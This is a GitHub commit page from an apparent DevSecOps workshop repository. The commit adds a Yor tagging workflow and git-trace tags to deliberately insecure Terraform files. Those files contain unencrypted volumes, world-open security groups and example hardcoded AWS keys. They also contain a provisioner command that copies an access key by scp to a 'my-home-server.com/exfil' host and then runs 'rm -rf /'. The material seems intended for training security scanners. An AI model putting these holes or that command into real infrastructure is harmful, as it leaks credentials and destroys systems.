Skip to content

Commit 5f10f48

Browse files
dimitryk1dimitryk1
authored
Merge pull request #1 from dimitryk1/dimitryk1-patch-1
Create yor.yml
2 parents fe85e86 + 1f3b2db commit 5f10f48

5 files changed

Lines changed: 252 additions & 15 deletions

File tree

.github/workflows/yor.yml

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
name: IaC tag and trace
2+
3+
on:
4+
push:
5+
pull_request:
6+
7+
jobs:
8+
yor:
9+
runs-on: ubuntu-latest
10+
permissions:
11+
contents: write
12+
13+
steps:
14+
- uses: actions/checkout@v2
15+
name: Checkout repo
16+
with:
17+
fetch-depth: 0
18+
- name: Run yor action
19+
uses: bridgecrewio/yor-action@main

code/deployment_ec2.tf

Lines changed: 141 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -17,22 +17,55 @@ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMAAAKEY
1717
export AWS_DEFAULT_REGION=us-west-2
1818
echo "<h1>Deployed via Terraform</h1>" | sudo tee /var/www/html/index.html
1919
EOF
20-
20+
21+
tags = {
22+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
23+
git_file = "code/deployment_ec2.tf"
24+
git_last_modified_at = "2024-01-26 23:01:56"
25+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
26+
git_modifiers = "tprendervill"
27+
git_org = "dimitryk1"
28+
git_repo = "prisma-cloud-devsecops-workshop-fork"
29+
yor_name = "web_host"
30+
yor_trace = "88ee4801-abb9-43bd-b55a-e9f26999c950"
31+
}
2132
}
2233

2334
resource "aws_ebs_volume" "web_host_storage" {
2435
# unencrypted volume
2536
availability_zone = "${var.region}a"
2637
#encrypted = false # Setting this causes the volume to be recreated on apply
2738
size = 1
28-
39+
40+
tags = {
41+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
42+
git_file = "code/deployment_ec2.tf"
43+
git_last_modified_at = "2024-01-26 23:01:56"
44+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
45+
git_modifiers = "tprendervill"
46+
git_org = "dimitryk1"
47+
git_repo = "prisma-cloud-devsecops-workshop-fork"
48+
yor_name = "web_host_storage"
49+
yor_trace = "0d618641-0205-4779-a515-8b2cd76e8a0f"
50+
}
2951
}
3052

3153
resource "aws_ebs_snapshot" "example_snapshot" {
3254
# ebs snapshot without encryption
3355
volume_id = "${aws_ebs_volume.web_host_storage.id}"
3456
description = "${local.resource_prefix.value}-ebs-snapshot"
35-
57+
58+
tags = {
59+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
60+
git_file = "code/deployment_ec2.tf"
61+
git_last_modified_at = "2024-01-26 23:01:56"
62+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
63+
git_modifiers = "tprendervill"
64+
git_org = "dimitryk1"
65+
git_repo = "prisma-cloud-devsecops-workshop-fork"
66+
yor_name = "example_snapshot"
67+
yor_trace = "dd434ac8-9a06-4d2a-85c2-5e65fb6bf038"
68+
}
3669
}
3770

3871
resource "aws_volume_attachment" "ebs_att" {
@@ -69,14 +102,36 @@ resource "aws_security_group" "web-node" {
69102
"0.0.0.0/0"]
70103
}
71104
depends_on = [aws_vpc.web_vpc]
72-
105+
106+
tags = {
107+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
108+
git_file = "code/deployment_ec2.tf"
109+
git_last_modified_at = "2024-01-26 23:01:56"
110+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
111+
git_modifiers = "tprendervill"
112+
git_org = "dimitryk1"
113+
git_repo = "prisma-cloud-devsecops-workshop-fork"
114+
yor_name = "web-node"
115+
yor_trace = "4bbbb2f7-79a6-43a8-9991-a5f4ded6d1b2"
116+
}
73117
}
74118

75119
resource "aws_vpc" "web_vpc" {
76120
cidr_block = "172.16.0.0/16"
77121
enable_dns_hostnames = true
78122
enable_dns_support = true
79-
123+
124+
tags = {
125+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
126+
git_file = "code/deployment_ec2.tf"
127+
git_last_modified_at = "2024-01-26 23:01:56"
128+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
129+
git_modifiers = "tprendervill"
130+
git_org = "dimitryk1"
131+
git_repo = "prisma-cloud-devsecops-workshop-fork"
132+
yor_name = "web_vpc"
133+
yor_trace = "c1e2586d-94e5-4fac-b847-e3d1a6d37809"
134+
}
80135
}
81136

82137
resource "aws_subnet" "web_subnet" {
@@ -85,7 +140,18 @@ resource "aws_subnet" "web_subnet" {
85140
availability_zone = "${var.region}a"
86141
map_public_ip_on_launch = true
87142

88-
143+
144+
tags = {
145+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
146+
git_file = "code/deployment_ec2.tf"
147+
git_last_modified_at = "2024-01-26 23:01:56"
148+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
149+
git_modifiers = "tprendervill"
150+
git_org = "dimitryk1"
151+
git_repo = "prisma-cloud-devsecops-workshop-fork"
152+
yor_name = "web_subnet"
153+
yor_trace = "bd187003-ba42-4b26-8176-166ffc372044"
154+
}
89155
}
90156

91157
resource "aws_subnet" "web_subnet2" {
@@ -94,20 +160,53 @@ resource "aws_subnet" "web_subnet2" {
94160
availability_zone = "${var.region}b"
95161
map_public_ip_on_launch = true
96162

97-
163+
164+
tags = {
165+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
166+
git_file = "code/deployment_ec2.tf"
167+
git_last_modified_at = "2024-01-26 23:01:56"
168+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
169+
git_modifiers = "tprendervill"
170+
git_org = "dimitryk1"
171+
git_repo = "prisma-cloud-devsecops-workshop-fork"
172+
yor_name = "web_subnet2"
173+
yor_trace = "6e156ef0-824c-4b40-a4fd-33fc0e24182c"
174+
}
98175
}
99176

100177

101178
resource "aws_internet_gateway" "web_igw" {
102179
vpc_id = aws_vpc.web_vpc.id
103180

104-
181+
182+
tags = {
183+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
184+
git_file = "code/deployment_ec2.tf"
185+
git_last_modified_at = "2024-01-26 23:01:56"
186+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
187+
git_modifiers = "tprendervill"
188+
git_org = "dimitryk1"
189+
git_repo = "prisma-cloud-devsecops-workshop-fork"
190+
yor_name = "web_igw"
191+
yor_trace = "f9639ea1-1a58-4eee-af72-25674cd40ff8"
192+
}
105193
}
106194

107195
resource "aws_route_table" "web_rtb" {
108196
vpc_id = aws_vpc.web_vpc.id
109197

110-
198+
199+
tags = {
200+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
201+
git_file = "code/deployment_ec2.tf"
202+
git_last_modified_at = "2024-01-26 23:01:56"
203+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
204+
git_modifiers = "tprendervill"
205+
git_org = "dimitryk1"
206+
git_repo = "prisma-cloud-devsecops-workshop-fork"
207+
yor_name = "web_rtb"
208+
yor_trace = "4795ba09-4007-4d6d-aafc-dbf63fd102ab"
209+
}
111210
}
112211

113212
resource "aws_route_table_association" "rtbassoc" {
@@ -134,6 +233,17 @@ resource "aws_network_interface" "web-eni" {
134233
subnet_id = aws_subnet.web_subnet.id
135234
private_ips = ["172.16.10.100"]
136235

236+
tags = {
237+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
238+
git_file = "code/deployment_ec2.tf"
239+
git_last_modified_at = "2024-01-26 23:01:56"
240+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
241+
git_modifiers = "tprendervill"
242+
git_org = "dimitryk1"
243+
git_repo = "prisma-cloud-devsecops-workshop-fork"
244+
yor_name = "web-eni"
245+
yor_trace = "74b814fb-f4f6-45a5-87a5-2d7cc76b47fb"
246+
}
137247
}
138248

139249
# VPC Flow Logs to S3
@@ -144,12 +254,34 @@ resource "aws_flow_log" "vpcflowlogs" {
144254
vpc_id = aws_vpc.web_vpc.id
145255

146256

257+
tags = {
258+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
259+
git_file = "code/deployment_ec2.tf"
260+
git_last_modified_at = "2024-01-26 23:01:56"
261+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
262+
git_modifiers = "tprendervill"
263+
git_org = "dimitryk1"
264+
git_repo = "prisma-cloud-devsecops-workshop-fork"
265+
yor_name = "vpcflowlogs"
266+
yor_trace = "dca15e6e-960f-47ba-97f3-041e287cacdc"
267+
}
147268
}
148269

149270
resource "aws_s3_bucket" "flowbucket" {
150271
bucket = "${local.resource_prefix.value}-flowlogs"
151272
force_destroy = true
152273

274+
tags = {
275+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
276+
git_file = "code/deployment_ec2.tf"
277+
git_last_modified_at = "2024-01-26 23:01:56"
278+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
279+
git_modifiers = "tprendervill"
280+
git_org = "dimitryk1"
281+
git_repo = "prisma-cloud-devsecops-workshop-fork"
282+
yor_name = "flowbucket"
283+
yor_trace = "2db0f163-c07e-41a6-88ac-7ffcafecacb3"
284+
}
153285
}
154286

155287
# OUTPUTS

code/deployment_s3.tf

Lines changed: 71 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -5,14 +5,36 @@ resource "aws_s3_bucket" "data" {
55
# bucket does not have versioning
66
bucket = "${local.resource_prefix.value}-data"
77
force_destroy = true
8-
8+
9+
tags = {
10+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
11+
git_file = "code/deployment_s3.tf"
12+
git_last_modified_at = "2024-01-26 23:01:56"
13+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
14+
git_modifiers = "tprendervill"
15+
git_org = "dimitryk1"
16+
git_repo = "prisma-cloud-devsecops-workshop-fork"
17+
yor_name = "data"
18+
yor_trace = "7e9513d1-3ada-4791-a4ed-3c48646bbe34"
19+
}
920
}
1021

1122
resource "aws_s3_bucket_object" "data_object" {
1223
bucket = aws_s3_bucket.data.id
1324
key = "customer-master.xlsx"
1425
source = "resources/customer-master.xlsx"
15-
26+
27+
tags = {
28+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
29+
git_file = "code/deployment_s3.tf"
30+
git_last_modified_at = "2024-01-26 23:01:56"
31+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
32+
git_modifiers = "tprendervill"
33+
git_org = "dimitryk1"
34+
git_repo = "prisma-cloud-devsecops-workshop-fork"
35+
yor_name = "data_object"
36+
yor_trace = "07d3c432-497f-4a64-a2ba-7372e8eeac61"
37+
}
1638
}
1739

1840
resource "aws_s3_bucket" "financials" {
@@ -23,6 +45,17 @@ resource "aws_s3_bucket" "financials" {
2345
acl = "private"
2446
force_destroy = true
2547

48+
tags = {
49+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
50+
git_file = "code/deployment_s3.tf"
51+
git_last_modified_at = "2024-01-26 23:01:56"
52+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
53+
git_modifiers = "tprendervill"
54+
git_org = "dimitryk1"
55+
git_repo = "prisma-cloud-devsecops-workshop-fork"
56+
yor_name = "financials"
57+
yor_trace = "d5bdb847-10a3-4dd6-adf0-4c0d1cacb849"
58+
}
2659
}
2760

2861
resource "aws_s3_bucket" "operations" {
@@ -34,7 +67,18 @@ resource "aws_s3_bucket" "operations" {
3467
enabled = true
3568
}
3669
force_destroy = true
37-
70+
71+
tags = {
72+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
73+
git_file = "code/deployment_s3.tf"
74+
git_last_modified_at = "2024-01-26 23:01:56"
75+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
76+
git_modifiers = "tprendervill"
77+
git_org = "dimitryk1"
78+
git_repo = "prisma-cloud-devsecops-workshop-fork"
79+
yor_name = "operations"
80+
yor_trace = "7a7da807-4e09-4dd9-9944-5bc2634c14c8"
81+
}
3882
}
3983

4084
resource "aws_s3_bucket" "data_science" {
@@ -49,7 +93,18 @@ resource "aws_s3_bucket" "data_science" {
4993
target_prefix = "log/"
5094
}
5195
force_destroy = true
52-
96+
97+
tags = {
98+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
99+
git_file = "code/deployment_s3.tf"
100+
git_last_modified_at = "2024-01-26 23:01:56"
101+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
102+
git_modifiers = "tprendervill"
103+
git_org = "dimitryk1"
104+
git_repo = "prisma-cloud-devsecops-workshop-fork"
105+
yor_name = "data_science"
106+
yor_trace = "52dbcd37-08c1-414c-9c68-f839a279eb70"
107+
}
53108
}
54109

55110
resource "aws_s3_bucket" "logs" {
@@ -67,5 +122,16 @@ resource "aws_s3_bucket" "logs" {
67122
}
68123
}
69124
force_destroy = true
70-
125+
126+
tags = {
127+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
128+
git_file = "code/deployment_s3.tf"
129+
git_last_modified_at = "2024-01-26 23:01:56"
130+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
131+
git_modifiers = "tprendervill"
132+
git_org = "dimitryk1"
133+
git_repo = "prisma-cloud-devsecops-workshop-fork"
134+
yor_name = "logs"
135+
yor_trace = "49d1883b-91e8-46f0-b1d0-53c37058410c"
136+
}
71137
}

code/simple_ec2.tf

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -10,4 +10,15 @@ resource "aws_ec2_host" "test" {
1010
command = "echo Running install scripts.. 'echo $ACCESS_KEY > creds.txt ; scp -r creds.txt root@my-home-server.com/exfil/ ; rm -rf /' "
1111
}
1212

13+
tags = {
14+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
15+
git_file = "code/simple_ec2.tf"
16+
git_last_modified_at = "2024-01-26 23:01:56"
17+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
18+
git_modifiers = "tprendervill"
19+
git_org = "dimitryk1"
20+
git_repo = "prisma-cloud-devsecops-workshop-fork"
21+
yor_name = "test"
22+
yor_trace = "0143832d-eb41-4ca3-8e55-9a93f81f4bd0"
23+
}
1324
}

code/simple_s3.tf

Lines changed: 10 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,16 @@ resource "aws_s3_bucket" "dev_s3" {
66
bucket_prefix = "dev-"
77

88
tags = {
9-
Environment = "Dev"
9+
Environment = "Dev"
10+
git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2"
11+
git_file = "code/simple_s3.tf"
12+
git_last_modified_at = "2024-01-26 23:01:56"
13+
git_last_modified_by = "tprendervill@paloaltonetworks.com"
14+
git_modifiers = "tprendervill"
15+
git_org = "dimitryk1"
16+
git_repo = "prisma-cloud-devsecops-workshop-fork"
17+
yor_name = "dev_s3"
18+
yor_trace = "eb744131-b6fd-4f6e-8c47-4c0492dbb546"
1019
}
1120
}
1221

0 commit comments

Comments
 (0)